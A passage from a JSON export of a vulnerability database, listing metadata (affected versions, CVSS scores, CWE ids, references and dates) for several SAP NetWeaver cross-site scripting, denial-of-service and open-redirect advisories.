keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3358"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"db": "BID",
"id": "33465"
},
{
"db": "PACKETSTORM",
"id": "74357"
},
{
"db": "PACKETSTORM",
"id": "74348"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-3358",
"trust": 2.9
},
{
"db": "BID",
"id": "33465",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "33685",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "51627",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2009-0255",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1021638",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2009-001639",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20090127 SAP NETWEAVER XSS VULNERABILITY",
"trust": 0.6
},
{
"db": "XF",
"id": "48237",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200901-384",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "74357",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "74348",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "33465"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"db": "PACKETSTORM",
"id": "74357"
},
{
"db": "PACKETSTORM",
"id": "74348"
},
{
"db": "NVD",
"id": "CVE-2008-3358"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
]
},
"id": "VAR-200901-0456",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.49319461333333336
},
"last_update_date": "2023-12-18T13:30:22.520000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://websmp206.sap-ag.de/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"db": "NVD",
"id": "CVE-2008-3358"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.csnc.ch/misc/files/advisories/cve-2008-3358.txt"
},
{
"trust": 1.7,
"url": "http://service.sap.com/sap/support/notes/1235253"
},
{
"trust": 1.6,
"url": "http://osvdb.org/51627"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/33685"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/33465"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1021638"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/500415/100/0/threaded"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2009/0255"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48237"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3358"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-3358"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/48237"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/500415/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2009/0255"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": "https://www.sdn.sap.com/irj/sdn/webdynpro"
},
{
"trust": 0.3,
"url": "/archive/1/500415"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3358"
},
{
"trust": 0.1,
"url": "https://www.sap.com)"
},
{
"trust": 0.1,
"url": "http://www.csnc.ch/en/downloads/advisories.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/product/9490/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/business_solutions/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/33685/"
}
],
"sources": [
{
"db": "BID",
"id": "33465"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"db": "PACKETSTORM",
"id": "74357"
},
{
"db": "PACKETSTORM",
"id": "74348"
},
{
"db": "NVD",
"id": "CVE-2008-3358"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "33465"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"db": "PACKETSTORM",
"id": "74357"
},
{
"db": "PACKETSTORM",
"id": "74348"
},
{
"db": "NVD",
"id": "CVE-2008-3358"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-01-27T00:00:00",
"db": "BID",
"id": "33465"
},
{
"date": "2009-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"date": "2009-01-27T23:35:23",
"db": "PACKETSTORM",
"id": "74357"
},
{
"date": "2009-01-27T15:25:01",
"db": "PACKETSTORM",
"id": "74348"
},
{
"date": "2009-01-28T18:30:00.170000",
"db": "NVD",
"id": "CVE-2008-3358"
},
{
"date": "2009-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-01-27T20:39:00",
"db": "BID",
"id": "33465"
},
{
"date": "2009-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"date": "2018-10-11T20:48:04.660000",
"db": "NVD",
"id": "CVE-2008-3358"
},
{
"date": "2009-02-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Portal Web Dynpro (WD) Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "74357"
},
{
"db": "PACKETSTORM",
"id": "74348"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
],
"trust": 0.8
}
}
var-201706-1157
Vulnerability from variot
SAP NetWeaver is prone to an unspecified denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201706-1157",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "99056"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "99056"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified denial-of-service vulnerability.\nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users.",
"sources": [
{
"db": "BID",
"id": "99056"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "99056",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "99056"
}
]
},
"id": "VAR-201706-1157",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:08:04.113000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2445071"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/06/13/sap-security-patch-day-june2017/"
}
],
"sources": [
{
"db": "BID",
"id": "99056"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "99056"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99056"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99056"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "99056"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Unspecified Denial of Service Vulnerability",
"sources": [
{
"db": "BID",
"id": "99056"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "99056"
}
],
"trust": 0.3
}
}
var-201311-0360
Vulnerability from variot
The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote attackers to redirect users to arbitrary web sites, conduct phishing attacks, and obtain sensitive information (cookies and SAPPASSPORT) via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a URI redirection vulnerability in SAP NetWeaver. SAP is prone to an open-redirection weakness because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. Other attacks are possible. SAP NetWeaver J2EE 6.40 and 7.02 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0360",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "6.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "6.x"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "6.4"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"db": "BID",
"id": "63783"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005193"
},
{
"db": "NVD",
"id": "CVE-2013-6814"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.02",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6814"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov of ERPScan",
"sources": [
{
"db": "BID",
"id": "63783"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6814",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-6814",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-14601",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6814",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2013-14601",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-285",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005193"
},
{
"db": "NVD",
"id": "CVE-2013-6814"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote attackers to redirect users to arbitrary web sites, conduct phishing attacks, and obtain sensitive information (cookies and SAPPASSPORT) via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a URI redirection vulnerability in SAP NetWeaver. SAP is prone to an open-redirection weakness because the application fails to properly sanitize user-supplied input. \nAn attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. Other attacks are possible. \nSAP NetWeaver J2EE 6.40 and 7.02 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6814"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005193"
},
{
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"db": "BID",
"id": "63783"
},
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6814",
"trust": 3.5
},
{
"db": "SECUNIA",
"id": "55778",
"trust": 2.2
},
{
"db": "BID",
"id": "63783",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2013-14601",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-285",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005193",
"trust": 0.8
},
{
"db": "IVD",
"id": "AD294C52-1EFC-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"db": "BID",
"id": "63783"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005193"
},
{
"db": "NVD",
"id": "CVE-2013-6814"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
]
},
"id": "VAR-201311-0360",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14601"
}
],
"trust": 1.1877617
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14601"
}
]
},
"last_update_date": "2023-12-18T13:03:39.719000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "Patch for SAP NetWeaver SAP Portal URI Redirection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/41226"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005193"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005193"
},
{
"db": "NVD",
"id": "CVE-2013-6814"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://service.sap.com/sap/support/notes/1854826"
},
{
"trust": 2.2,
"url": "http://secunia.com/advisories/55778"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6814"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6814"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"db": "BID",
"id": "63783"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005193"
},
{
"db": "NVD",
"id": "CVE-2013-6814"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"db": "BID",
"id": "63783"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005193"
},
{
"db": "NVD",
"id": "CVE-2013-6814"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-285"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-22T00:00:00",
"db": "IVD",
"id": "ad294c52-1efc-11e6-abef-000c29c66e3d"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14601"
},
{
"date": "2013-10-30T00:00:00",
"db": "BID",
"id": "63783"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
